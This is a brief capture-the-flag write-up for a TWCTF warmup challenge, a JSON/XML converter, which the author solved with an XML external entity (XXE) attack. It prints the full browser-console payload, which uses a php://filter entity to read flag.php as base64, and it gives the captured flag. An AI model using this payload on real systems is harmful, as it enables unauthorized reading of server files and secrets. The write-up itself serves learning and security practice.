This was a simple JSON-to-XML / XML-to-JSON converter. The challenge was categorized as “warmup”, so to my not-that-big surprise the most basic XXE vulnerability worked as expected:
I used the following code (written into Chrome’s console) to leak the flag:
$.post('/', { xml: `<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT leak ANY><!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/flag.php">]><root><leak>&xxe;</leak></root>` }, function(data) { $('#json').val(atob(JSON.parse(data).leak)); });The flag was:
TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}